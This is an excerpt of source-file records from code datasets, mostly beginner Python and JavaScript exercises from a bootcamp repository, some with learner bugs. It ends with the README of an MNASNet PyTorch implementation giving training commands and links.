"blob_id": "493c23d45f6c6b81b6218b7300f6e9e7f3f586bc",
"content_id": "15a0d1cdb410fbf1e64f438849ff0f646d9ec588",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 256,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 17,
"path": "/week-7/wednesday/factory.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nfunction createCar(color, type, km) {\n return {\n color: color,\n type: type,\n km: km,\n ride: function(km) {\n this.km += km;\n }\n }\n}\n\nvar lambo = createCar(\"sarga\", \"asffv\", 500);\nlambo.ride(100);\n\nconsole.log(lambo.km);\n"
},
{
"alpha_fraction": 0.5541528463363647,
"alphanum_fraction": 0.5634551644325256,
"avg_line_length": 22.153846740722656,
"blob_id": "3a7426dc103bd4ca534ce222175228e793826498",
"content_id": "18aac678efd7e5e59bd0b564e8be3200dd63b703",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1505,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 65,
"path": "/week-4/project/todo_app.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import os\n\nfilename = \"list.txt\"\n\ndef list_items():\n text = open(\"list.txt\", \"r\").readlines()\n for index, line in enumerate(text):\n print(index +1, line)\n todo_menu()\n\n\ndef todo_menu():\n print(\"1. Current list\" + \"\\n\" + \"2. Add item\" + \"\\n\" + \"3. Remove item\" + \"\\n\" + \"4. Move item to Complete direntory\" + \"\\n\" + \"5. EXIT\" + \"\\n\")\n chooser = int(input(\"Choose an action! \"))\n if chooser == 1:\n list_items()\n elif chooser == 2:\n add_item()\n elif chooser == 3:\n remove_item()\n elif chooser == 4:\n move_item()\n elif chooser == 5:\n pass\n else:\n print(\"You can not choose that!\")\n\n\ndef add_item():\n text = open(\"list.txt\", \"a\")\n new_item = input(\"Give me a new TODO! \")\n text.write(new_item + \"\\n\")\n text.close()\n todo_menu()\n\ndef remove_item():\n text = open(\"list.txt\", \"r\").readlines()\n remove_item = int(input(\"What would you like to delete? \"))\n text_write = open(\"list.txt\", \"w\")\n del text[remove_item -1]\n for line in text:\n text_write.write(line)\n text_write.close()\n return todo_menu()\n\ndef move_item():\n text = open(\"list.txt\", \"r\").readlines()\n move_item = int(input( \"Which TODO is complete? \"))\n completed_item = open(\"completed.txt\", \"w\")\n completed_item.write(text[move_item - 1])\n text_write = open(\"list.txt\", \"w\")\n del text[move_item -1]\n for line in text:\n text_write.write(line)\n text_write.close()\n return todo_menu()\n\n\n\n\n\n\n\n\ntodo_menu()\n"
},
{
"alpha_fraction": 0.5524475574493408,
"alphanum_fraction": 0.5769230723381042,
"avg_line_length": 20.185184478759766,
"blob_id": "2fd5d3140745cbbf5555afb435e9742cc61da8d0",
"content_id": "f82d505ef0679bd1d42ba51fb4da2eb345dc815d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 572,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 27,
"path": "/week-4/practice/dictionary.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "student = {\"labmeret\": 45, \"nev\": \"tibike\", \"kor\": 8.5}\nprint(student[\"labmeret\"])\n\n\nstudents = [\n {\"name\": \"tibi\", \"age\": 6},\n {\"name\": \"adorjan\", \"age\": 9},\n {\"name\": \"aurel\", \"age\": 7},\n {\"name\": \"dezso\", \"age\": 12}\n]\n\nstudents_at_least_8 = []\n\nfor student in students:\n if student[ \"age\"] > 8:\n students_at_least_8.append(student[\"name\"])\n\n\nprint(students_at_least_8)\n\n\nstudents_name_starts_a = []\n\nfor student in students:\n if student[ \"name\" ][0] == \"a\":\n students_name_starts_a.append(student[ \"name\"])\nprint(students_name_starts_a)\n"
},
{
"alpha_fraction": 0.47911548614501953,
"alphanum_fraction": 0.5184274911880493,
"avg_line_length": 13.034482955932617,
"blob_id": "abc23082a8fdf320cc38f3d79a013dd3b6c7e1f3",
"content_id": "595be5f0cf01d267ba854295bbdf72f6630c781e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 407,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 29,
"path": "/week-4/practice/34.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "# 3 = 1 * 2* 3\n\ndef fact(numbers):\n output = 1\n i = 1\n while i <= numbers:\n output *= i\n i += 1\n return output\n\nprint(fact(6))\n\n\ndef fact(numbers):\n output = 1\n for i in range(1, numbers + 1):\n output *= i\n return output\n\nprint(fact(6))\n\n\ndef fact(numbers):\n if numbers == 1:\n return 1\n else:\n return fact(numbers - 1) * numbers\n\nprint(fact(6))\n"
},
{
"alpha_fraction": 0.5317073464393616,
"alphanum_fraction": 0.5512195229530334,
"avg_line_length": 12.666666984558105,
"blob_id": "27c7becfd42b59be1e0f926ba81945d74b5a8d19",
"content_id": "db24a9cc00debb0830a3c969d65925a6c2e0a40e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 205,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 15,
"path": "/week-3/tuesday/practice.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "def greet(name):\n return \"Hello, \" + name\n\nresult = greet (\"Dorka\")\nprint(result)\n\ng = []\ndef add (a, b):\n res = a + b\n g.append(res)\n return res\n\nprint (add(1, 2))\nprint (add(8, 4))\nprint (g)\n"
},
{
"alpha_fraction": 0.630630612373352,
"alphanum_fraction": 0.6756756901741028,
"avg_line_length": 12.875,
"blob_id": "052b7a84a3ecb7a76c02359229d860c92a14efb5",
"content_id": "90ea087a1afb365e0d9ef27c74c6094864b1bbd6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 111,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 8,
"path": "/week-8/tuesday/workshop/timeout.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar timeout = setTimeout(function() {\n console.log(\"Yaay\");\n}, 10000);\n\n\nclearTimeout(timeout);\n"
},
{
"alpha_fraction": 0.6627451181411743,
"alphanum_fraction": 0.6627451181411743,
"avg_line_length": 14.9375,
"blob_id": "0583d6503edb1822affe5112d4db140d30aa3a03",
"content_id": "d58db8e051574981cb0d01a5f1f538db796cfdb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 255,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 16,
"path": "/week-8/thursday/read.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar fs = require(\"fs\");\n\n\nfunction readAppleTxt(callback) {\n fs.readFile(\"apple.txt\", function(error, content) {\n var output= String(content);\n callback(output);\n });\n};\n\n\nreadAppleTxt(function(content) {\n console.log(content);\n});\n"
},
{
"alpha_fraction": 0.6141906976699829,
"alphanum_fraction": 0.6341463327407837,
"avg_line_length": 14.033333778381348,
"blob_id": "d3f2802ac2bb260c55559c2624a8e913851fe03d",
"content_id": "83a9a891b8c14fe04083438c14ffbecc76bd710b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 30,
"path": "/week-7/wednesday/map.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\n//1.\nvar benaszavak = [\"kuty\",\n\"macsk\",\n\"alm\",\n\"gabon\"];\n\nvar faszaszavak = [];\n\nfor (var i = 0; i < benaszavak.length; i++) {\n faszaszavak.push(benaszavak[i] + \"a\");\n};\nconsole.log(faszaszavak);\n\n//2.\nvar faszaszavak2 = [];\n\nbenaszavak.forEach(function (szo) {\n faszaszavak2.push(szo + \"a\");\n});\n\nconsole.log(faszaszavak2);\n\n//3.\nvar faszaszavak3 = benaszavak.map(function (szo) {\n return szo + \"a\";\n});\n\nconsole.log(faszaszavak3);\n"
},
{
"alpha_fraction": 0.5866666436195374,
"alphanum_fraction": 0.6066666841506958,
"avg_line_length": 21.5,
"blob_id": "a72ed642fff04acb1e48f127ca98e09da00f9c2f",
"content_id": "a67d872126ffb581b2c48c88c79bc5fe5f7d5370",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 450,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 20,
"path": "/week-7/wednesday/kids.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar kids = [\n{name: \"beluka\", candies: 3},\n{name: \"katika\", candies: 15},\n{name: \"sanyika\", candies: 30},\n{name: \"petike\", candies: 0},\n{name: \"cicuka\", candies: 8}\n];\n\nfunction getRichestKidName(kids) {\n var richestkid = kids[0];\n for (var i = 1; i < kids.length; i++) {\n if ( richestkid.candies < kids[i].candies) {\n richestkid = kids[i];\n }\n }\n return richestkid.name;\n }\nconsole.log(getRichestKidName(kids));\n"
},
{
"alpha_fraction": 0.6639004349708557,
"alphanum_fraction": 0.6639004349708557,
"avg_line_length": 17.538461685180664,
"blob_id": "0c784e0cf66ca340e7aaf2a7205a27e59019cb06",
"content_id": "49da4064ed80655e6b48c608fa56cc114891bab9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 241,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 13,
"path": "/week-8/tuesday/function.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar button = document.querySelector(\"button\")\n\nbutton.addEventListener(\"click\", shout());\n\nfunction shout() {\n console.log(\"agsd\");\n console.log(\"agsd\");\n console.log(\"agsd\");\n console.log(\"agsd\");\n console.log(\"agsd\");\n}\n"
},
{
"alpha_fraction": 0.43323442339897156,
"alphanum_fraction": 0.4925816059112549,
"avg_line_length": 13.65217399597168,
"blob_id": "321b757bdd830446c69253e2b97b79b554e97aa1",
"content_id": "2212d5baac020472301a3de32bd02ed37a975348",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 337,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 23,
"path": "/week-7/tuesday/min.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar number = [7, 8, 4, -1, 13, 55];\nvar a = number[0];\n\nfor (var i = 1; i < number.length; i++) {\n if (number[i] < a) {\n a = number[i];\n }\n}\n\nconsole.log(a);\n\n\n\nvar number = [7, 8, 4, -1, 13, 55];\nvar a = number[0];\n\nfor (var i = 1; i < number.length; i++) {\n a = (number[i] < a ? number[i] : a);\n}\n\nconsole.log(a);\n"
},
{
"alpha_fraction": 0.4084506928920746,
"alphanum_fraction": 0.5070422291755676,
"avg_line_length": 10.833333015441895,
"blob_id": "e9a6dc0792a97acbcbd3c8f4024de55519a6f325",
"content_id": "077ec7ed3e9ee9742d5a88cb35f9469a34e33cc0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 71,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 6,
"path": "/week-3/Monday/for.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "numbers = [15, 3, 26, 4]\ns = 0\n\nfor n in numbers:\n s += n\nprint (s)\n"
},
{
"alpha_fraction": 0.3507462739944458,
"alphanum_fraction": 0.41044774651527405,
"avg_line_length": 10.166666984558105,
"blob_id": "455fdfe62c400e56b2ee1605dfbdd4fbc9aa3cc3",
"content_id": "9853947e352967cfe41b00ad3fedefbef66665de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 12,
"path": "/week-4/practice/27.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "ab = [3, 4, 5, 6, 7]\ni = 0\n\nwhile i < len(ab):\n ab[i] *= 2\n i += 1\n\nprint(ab)\n\n----\nfor i in range(len(ab)):\n ab[i] *= ab[i]\n"
},
{
"alpha_fraction": 0.5318351984024048,
"alphanum_fraction": 0.5468164682388306,
"avg_line_length": 16.799999237060547,
"blob_id": "aa8cc71eed2de6d6f6e3050075999f4dd6ddf2b9",
"content_id": "7eb842b5102dd6259ad71764c9afc7946999e522",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 267,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 15,
"path": "/week-7/practice/range3.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nfunction range(from, to, steps) {\n var output = [];\n if (steps > 0) {\n for (var i = from; i < to; i+=steps){\n output.push(i);\n }\n} else { for(var i = from; i > to; i+=steps){\n output.push(i);\n}\n return output;\n}\n\nconsole.log(range(8, 4, -1));\n"
},
{
"alpha_fraction": 0.5618221163749695,
"alphanum_fraction": 0.6182212829589844,
"avg_line_length": 20.952381134033203,
"blob_id": "7f8f7c2faa0a74f72cdbeee5ce6409d8492b5cd5",
"content_id": "ba74cc3a11c60a8f7ad854fae7443c49b7d93d00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 461,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 21,
"path": "/week-5/monday/rpg/cerlic_test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom cerlic import Cerlic\n\nclass TestCerlic(unittest.TestCase):\n def test_existance(self):\n cerlic = Cerlic(\"Test\", 100, 10)\n\n def test_inheritance(self):\n cerlic = Cerlic(\"Test\", 100, 10)\n self.assertEqual(cerlic. hp, 100)\n\n def test_healing(self):\n cerlic = Cerlic(\"Test\", 100, 10)\n ally = Cerlic(\"Ally\", 100, 10)\n cerlic.heal(ally)\n self.assertEqual(ally.hp, 110)\n\n\n\n\nunittest.main()\n"
},
{
"alpha_fraction": 0.6815286874771118,
"alphanum_fraction": 0.6815286874771118,
"avg_line_length": 9.466666221618652,
"blob_id": "1ce7d59024a997853388a679e1d2f4ede08808fe",
"content_id": "01e577eb838f6354698bd5c86b8042ee185c92a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 157,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 15,
"path": "/week-6/project/menu_test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom menu import MainMenu\n\n\nclass TestMenu(unittest.TestCase):\n def test_if_exist(self):\n menu = MainMenu()\n\n\n\n\n\n\n\nunittest.main()\n"
},
{
"alpha_fraction": 0.5103448033332825,
"alphanum_fraction": 0.5241379141807556,
"avg_line_length": 8.0625,
"blob_id": "84fb0219128c4db08be63b4c03f3e996b9345065",
"content_id": "0c2a4b61440092d1f38ce2b8622bebe8cf92d6cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 148,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 16,
"path": "/week-3/tuesday/def.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "def add(a, b):\n return a +b\nnum = add(3,4)\n print(num)\n\n\n\n\nname = \"\"\n\ndef greet():\n print(\"csáá\" + name)\n\n\ngreet(\"Dorka\")\ngreet(\"Béla\")\n"
},
{
"alpha_fraction": 0.5456674695014954,
"alphanum_fraction": 0.5526931881904602,
"avg_line_length": 18.409090042114258,
"blob_id": "cb35d0e4a2513d1c3133a158680d541c44f7c808",
"content_id": "c54309be5d7834886de0936e8a8f173e3d87e61b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 427,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 22,
"path": "/week-5/tuesday/node.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class Node:\n def __init__(self, value, left = Node, right = Node):\n self.value = value\n self.left = left\n self.right = right\n\nroot = Node(\n 1,\n Node(2) #left\n Node(3) #right\n)\n\nclass LeftIterator:\n def __init__(self, root):\n self.curr = root\n\n def next(self):\n self.curr = self.curr.left\n return self.curr is not None\n\n def current(self):\n return self.curr\n"
},
{
"alpha_fraction": 0.57485032081604,
"alphanum_fraction": 0.6227545142173767,
"avg_line_length": 12.916666984558105,
"blob_id": "76f8b7796ad47036663c6efd85f6324da8ce4c7a",
"content_id": "4c5efb9f022eff77543837fd4caedef0c9843ce8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 12,
"path": "/week-8/tuesday/workshop/intervall.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\"\n\nvar count = 0;\n\nsetInterval(function() {\n count++;\n console.log(\"Yeyeee \" + count)\n}, 500);\n\nsetTimeout(function() {\n console.log(\"Bibiii\")\n}, 5000);\n"
},
{
"alpha_fraction": 0.6937798857688904,
"alphanum_fraction": 0.6937798857688904,
"avg_line_length": 22.22222137451172,
"blob_id": "0abb60f3d0ce521c5c6ef44d9903a5ea68409167",
"content_id": "35e3bea4f55c443dabe2acc9fd749862afdf4fdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 209,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 9,
"path": "/week-4/practice/41.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "filename = \"alma.txt\"\n\ndef print_content(filename):\n file_to_print = open(filename)\n file_content = file_to_print.read()\n file_to_print.close()\n return file_content\n\nprint(print_content(filename))\n"
},
{
"alpha_fraction": 0.6633166074752808,
"alphanum_fraction": 0.6783919334411621,
"avg_line_length": 17.090909957885742,
"blob_id": "4769e5d1dc78f79540e61472eee43b9ba885acba",
"content_id": "d390743e4b48b6e58b4986b38f348613a1ca52d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 199,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 11,
"path": "/week-4/tuesday/test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "from reverse import reverse_list\n\nimport os\n\nprint(reverse_list([1, 2, 3]))\nprint(os.getcwd())\n\nalma_file = open( \"alma.txt\", \"w\")\nprint(alma_file.read())\nalma_file.write( \"eper\" )\nalma_file.close()\n"
},
{
"alpha_fraction": 0.6346516013145447,
"alphanum_fraction": 0.6440678238868713,
"avg_line_length": 26.947368621826172,
"blob_id": "25bb68dcc0ebd59c82467d1c5c05d0bad6776c65",
"content_id": "29bf7d30845c41999bfc27285f05d7b13ffc79e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 531,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 19,
"path": "/week-5/monday/countletters/countletters_test.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom countletters import count_letters\n\nclass LettersCounterTest(unittest.TestCase):\n def test_if_exist(self):\n self.assertEqual(count_letters(\"\"), {})\n\n def test_same_letter(self):\n self.assertEqual(count_letters(\"a\"), {\"a\":1})\n self.assertEqual(count_letters(\"aa\"), {\"a\":2})\n\n def test_different_letters(self):\n self.assertEqual(count_letters(\"b\"), {\"b\":1})\n\n def test_distinct_letters(self):\n self.assertEqual(count_letters(\"ab\"), {\"a\":1, \"b\":1})\n\n\nunittest.main()\n"
},
{
"alpha_fraction": 0.45886075496673584,
"alphanum_fraction": 0.45886075496673584,
"avg_line_length": 25.33333396911621,
"blob_id": "ce1822f769ee2c616e90e053d2bc0e79315c3e44",
"content_id": "8b2614706bde42457517f609a4cc7247819d5ac4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 316,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 12,
"path": "/week-3/wednesday/space.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "class SuperString(object):\n def __init__(self, my_string):\n self.string = my_string\n\n def my_space(self)\n my_space = \"\"\n for i in self.string:\n if i == \" \":\n my_space = my_space \"_\"\n else:\n my_space = my_space +i\n return my_space\n"
},
{
"alpha_fraction": 0.5108225345611572,
"alphanum_fraction": 0.536796510219574,
"avg_line_length": 15.5,
"blob_id": "5c11b053132a0a6d7939111fc2834c911ed06934",
"content_id": "dc5308e9ad89b1381f9f0c974ccd89ba04f9c9c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 231,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 14,
"path": "/week-3/wednesday/python.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "def get_fizz(number):\n if number % 3 == 0:\n return\"fizz\"\n else:\n return number\n\n\ndef fizzbuzz(minimum, maximum):\n n = minimum\n while n <= maximum:\n print(get_fizz(n))\n n +=1\n\nfizzbuzz(0, 50)\n"
},
{
"alpha_fraction": 0.6399999856948853,
"alphanum_fraction": 0.6399999856948853,
"avg_line_length": 24,
"blob_id": "62dd4acab8447153529f10172caf9e2098735318",
"content_id": "228275f167d0d5074b1e296125982d203767c086",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 9,
"path": "/week-4/practice/line_char_count.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "def wc(filename):\n input_file = open(\"alma.txt\")\n file_content = input_file.read()\n line_count = len(file_content.split( \"\\n\"))\n input_file.close()\n return [line_count, len(file_content)]\n\n\nprint(wc(filename))\n"
},
{
"alpha_fraction": 0.6545454263687134,
"alphanum_fraction": 0.6545454263687134,
"avg_line_length": 19,
"blob_id": "aacc2bf85276657f779832c95e7ba29b1c90eb0f",
"content_id": "99432bd5fdc0a9eefe232039438c4fb3f0f45dcf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 11,
"path": "/week-8/thursday/callback7.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nvar fs = require(\"fs\");\n\nvar out = \"\";\n\nfs.readFile(\"apple.txt\", function(error, almaContent) {\n fs.readFile(\"pear.txt\", function(error, pearContent) {\n console.log(almaContent + pearContent);\n })\n})\n"
},
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 10,
"blob_id": "8af8477469d5d9f5489e94675de92d3b0e1452fe",
"content_id": "098b95a3d96f4fa8e55c3ceb070244c83caf50d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 3,
"path": "/week-7/wednesday/script.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nalert(\"Helloka\");\n"
},
{
"alpha_fraction": 0.4893617033958435,
"alphanum_fraction": 0.5265957713127136,
"avg_line_length": 17.799999237060547,
"blob_id": "0092d1513f3eb8e24f1d0713d1ee3f7021dd70f1",
"content_id": "4ed69663338e484a22f5f2ea95a148908074ae9a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 188,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 10,
"path": "/week-4/practice/36.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "numbers = [3, 4, 5, 6, 7]\n\ndef filter_odd(my_list):\n output = []\n for i in my_list:\n if i % 2 == 0:\n output.append(i)\n return output\n\nprint(filter_odd(numbers))\n"
},
{
"alpha_fraction": 0.45724907517433167,
"alphanum_fraction": 0.4795539081096649,
"avg_line_length": 13.94444465637207,
"blob_id": "7c0575a21e6ed3ae66703af613dfb7b2ce05823c",
"content_id": "1730f8d2682adcbd3b0549087d393d3da48e6fb3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 269,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 18,
"path": "/week-3/tuesday/greetl.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "#def greet(name, hi = \"Hello\"):\n# print(hi + \", \" + name)\n#\n#greet(\"Dorka\" , \"hello\")\n#greet(\"Dorka\" , \"hy\")\n\n\ndef add(a, b, res = None):\n if res is None:\n res = []\n r = a + b\n res.append(r)\n print(res)\n return r\n\nadd(1, 2)\nadd(3, 4)\nadd(5, 6)\n"
},
{
"alpha_fraction": 0.5350318551063538,
"alphanum_fraction": 0.5605095624923706,
"avg_line_length": 11.5600004196167,
"blob_id": "ce9a115f995216a5b74f5afad18c75dfa2bd6d90",
"content_id": "ea85342cbdb00140836b27177ab697cc2f5d73a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 315,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 25,
"path": "/week-7/tuesday/for.js",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "\"use strict\";\n\nfor (var i = 1; i < 11 ; i++) {\n console.log(i)\n}\n\n\n\nvar dogs = [\"berni\", \"tacskó\", \"pincs\"]\n\nfor (var i = 0; i < dogs.length; i++) {\n console.log(dogs[i])\n}\n\n\n//csak objektumra!\nvar student = {\n kor: 12,\n name:\"csaba\",\n labmeret: 45\n};\n\nfor (var key in student) {\nconsole.log(student[key]);\n}\n"
},
{
"alpha_fraction": 0.5650224089622498,
"alphanum_fraction": 0.591928243637085,
"avg_line_length": 21.299999237060547,
"blob_id": "8e03a1b5f9bda96b952248dc32903a909775a0ab",
"content_id": "6af94db06941f693e5634914982852efe11c8589",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 223,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 10,
"path": "/week-4/practice/37.py",
"repo_name": "greenfox-academy/HDodek",
"src_encoding": "UTF-8",
"text": "numbers = [7, 5, 8, -1, 2]\n\ndef minimal_element(my_list):\n min_number = my_list[0]\n for num in my_list:\n if min_number > num:\n min_number = num\n return min_number\n\nprint(minimal_element(numbers))\n"
}
] | 72 |
snakers4/MNASNet-pytorch-1
|
https://github.com/snakers4/MNASNet-pytorch-1
|
551f383e3a01cd07695612e6157598d51e1afc2f
|
225f4872091ed0752df3a95aad54b5ec5dedff02
|
66dba7e5f0ed442f8bfd172372de2ee0e88edf36
|
refs/heads/master
| 2020-04-30T01:09:44.533204 | 2019-03-18T17:45:20 | 2019-03-18T17:45:20 | 176,521,806 | 2 | 0 | null | 2019-03-19T13:48:17 | 2019-03-19T13:40:56 | 2019-03-18T17:45:26 | null |
[
{
"alpha_fraction": 0.6728922128677368,
"alphanum_fraction": 0.7022411823272705,
"avg_line_length": 40.66666793823242,
"blob_id": "9fc949f19820f236b1271191a90457af0ff16e08",
"content_id": "da6302bce78e2d4614bbad3c8ac6f839ceaba8d3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1874,
"license_type": "permissive",
"max_line_length": 172,
"num_lines": 45,
"path": "/README.md",
"repo_name": "snakers4/MNASNet-pytorch-1",
"src_encoding": "UTF-8",
"text": "# MNASNet in PyTorch\n\nAn implementation of `MNASNet` in PyTorch. `MNASNet` is an efficient\nconvolutional neural network architecture for mobile devices,\ndeveloped with architectural search. For more information check the paper:\n[MnasNet: Platform-Aware Neural Architecture Search for Mobile](https://arxiv.org/abs/1807.11626)\n\nThe model is is implemented by\n[billhhh](https://github.com/billhhh/MnasNet-pytorch-pretrained)\nand the initial idea of reproducing MNASNet is by\n[snakers4](https://github.com/snakers4/mnasnet-pytorch)\n\n## Usage\n\nClone the repo:\n```bash\ngit clone https://github.com/Randl/MNASNet-pytorch\npip install -r requirements.txt\n```\n\nUse the model defined in `model.py` to run ImageNet example:\n```bash\npython3 -m torch.distributed.launch --nproc_per_node=8 imagenet.py --dataroot \"/path/to/imagenet/\" --warmup 5 --sched cosine -lr 0.2 -b 128 -d 5e-5 --world-size 8 --seed 42\n```\n\nTo continue training from checkpoint\n```bash\npython imagenet.py --dataroot \"/path/to/imagenet/\" --resume \"/path/to/checkpoint/folder\"\n```\n## Results\nInitially I've got 72+% top-1 accuracy, but the checkpointing didn't\nwork properly. I believe the results are reproducable.\n\n|Classification Checkpoint| MACs (M) | Parameters (M)| Top-1 Accuracy| Top-5 Accuracy| Claimed top-1| Claimed top-5|\n|-------------------------|------------|---------------|---------------|---------------|---------------|---------------|\n\nYou can test it with\n```bash\npython imagenet.py --dataroot \"/path/to/imagenet/\" --resume \"results/shufflenet_v2_0.5/model_best.pth.tar\" -e\n```\n\n## Other implementations\n\n- [Mnasnet.MXNet](https://github.com/chinakook/Mnasnet.MXNet) -- A Gluon implementation of Mnasnet, 73.6% top-1 and 91.52% top-5\n- [MnasNet-pytorch-pretrained](https://github.com/billhhh/MnasNet-pytorch-pretrained) -- A PyTorch implementation of Mnasnet, 70.132% top-1 and 89.434% top-5"
},
{
"alpha_fraction": 0.5986394286155701,
"alphanum_fraction": 0.6190476417541504,
